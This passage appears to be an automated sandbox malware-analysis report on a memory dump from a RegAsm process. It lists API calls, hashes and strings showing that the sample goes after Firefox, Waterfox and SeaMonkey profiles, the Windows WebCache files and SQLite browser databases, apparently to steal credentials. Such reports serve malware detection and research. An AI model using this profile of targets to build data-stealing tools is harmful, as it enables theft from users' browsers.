                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                • String ID: BIN
                                                • API String ID: 1668488027-1015027815
                                                • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED

                                                Control-flow Graph

                                                APIs
                                                • memset.MSVCRT ref: 00403CBF
                                                • memset.MSVCRT ref: 00403CD4
                                                • memset.MSVCRT ref: 00403CE9
                                                • memset.MSVCRT ref: 00403CFE
                                                • memset.MSVCRT ref: 00403D13
                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                • memset.MSVCRT ref: 00403DDA
                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                • String ID: Waterfox$Waterfox\Profiles
                                                • API String ID: 4039892925-11920434
                                                • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA

                                                Control-flow Graph

                                                APIs
                                                • memset.MSVCRT ref: 00403E50
                                                • memset.MSVCRT ref: 00403E65
                                                • memset.MSVCRT ref: 00403E7A
                                                • memset.MSVCRT ref: 00403E8F
                                                • memset.MSVCRT ref: 00403EA4
                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                • memset.MSVCRT ref: 00403F6B
                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                • API String ID: 4039892925-2068335096
                                                • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                APIs
                                                • memset.MSVCRT ref: 00403FE1
                                                • memset.MSVCRT ref: 00403FF6
                                                • memset.MSVCRT ref: 0040400B
                                                • memset.MSVCRT ref: 00404020
                                                • memset.MSVCRT ref: 00404035
                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                • memset.MSVCRT ref: 004040FC
                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                • API String ID: 4039892925-3369679110
                                                • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                APIs
                                                • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memcpy
                                                • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                • API String ID: 3510742995-2641926074
                                                • Opcode ID: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                • Opcode Fuzzy Hash: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                APIs
                                                • CreateFileW.KERNEL32(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                • GetLastError.KERNEL32 ref: 0041847E
                                                • free.MSVCRT ref: 0041848B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: CreateErrorFileLastfree
                                                • String ID: |A
                                                • API String ID: 981974120-1717621600
                                                • Opcode ID: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                                                • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                • Opcode Fuzzy Hash: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                                                • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                APIs
                                                  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                • memset.MSVCRT ref: 004033B7
                                                • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                • wcscmp.MSVCRT ref: 004033FC
                                                • _wcsicmp.MSVCRT ref: 00403439
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                • String ID: $0.@
                                                • API String ID: 2758756878-1896041820
                                                • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                APIs
                                                • memset.MSVCRT ref: 00403C09
                                                • memset.MSVCRT ref: 00403C1E
                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                • wcscat.MSVCRT ref: 00403C47
                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                • wcscat.MSVCRT ref: 00403C70
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                • API String ID: 1534475566-1174173950
                                                • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                • String ID:
                                                • API String ID: 669240632-0
                                                • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                APIs
                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                • memset.MSVCRT ref: 00414C87
                                                • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                • wcscpy.MSVCRT ref: 00414CFC
                                                  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                Strings
                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: CloseFolderPathSpecialVersionmemsetwcscpy
                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                • API String ID: 2925649097-2036018995
                                                • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                APIs
                                                • wcschr.MSVCRT ref: 00414458
                                                • _snwprintf.MSVCRT ref: 0041447D
                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                • String ID: "%s"
                                                • API String ID: 1343145685-3297466227
                                                • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                APIs
                                                • memset.MSVCRT ref: 004087D6
                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                • memset.MSVCRT ref: 00408828
                                                • memset.MSVCRT ref: 00408840
                                                • memset.MSVCRT ref: 00408858
                                                • memset.MSVCRT ref: 00408870
                                                • memset.MSVCRT ref: 00408888
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                • String ID:
                                                • API String ID: 2911713577-0
                                                • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memcmp
                                                • String ID: @ $SQLite format 3
                                                • API String ID: 1475443563-3708268960
                                                • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _wcsicmpqsort
                                                • String ID: /nosort$/sort
                                                • API String ID: 1579243037-1578091866
                                                • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                APIs
                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: HandleModuleProcessTimes
                                                • String ID: GetProcessTimes$kernel32.dll
                                                • API String ID: 116129598-3385500049
                                                • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                APIs
                                                • memset.MSVCRT ref: 0040E60F
                                                • memset.MSVCRT ref: 0040E629
                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                Strings
                                                • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                • API String ID: 2887208581-2114579845
                                                • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                APIs
                                                • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                                                • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                • LockResource.KERNEL32(00000000), ref: 004148EF
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Resource$FindLoadLockSizeof
                                                • String ID:
                                                • API String ID: 3473537107-0
                                                • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ??3@
                                                • String ID:
                                                • API String ID: 613200358-0
                                                • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                APIs
                                                Strings
                                                • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset
                                                • String ID: only a single result allowed for a SELECT that is part of an expression
                                                • API String ID: 2221118986-1725073988
                                                • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memcmp
                                                • String ID: $$8
                                                APIs
                                                  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                  • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                  • Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                  • Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E
                                                • CloseHandle.KERNEL32(000000FF), ref: 0040E582
                                                  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                  • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                • DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                                                  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                  • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                • String ID:
                                                APIs
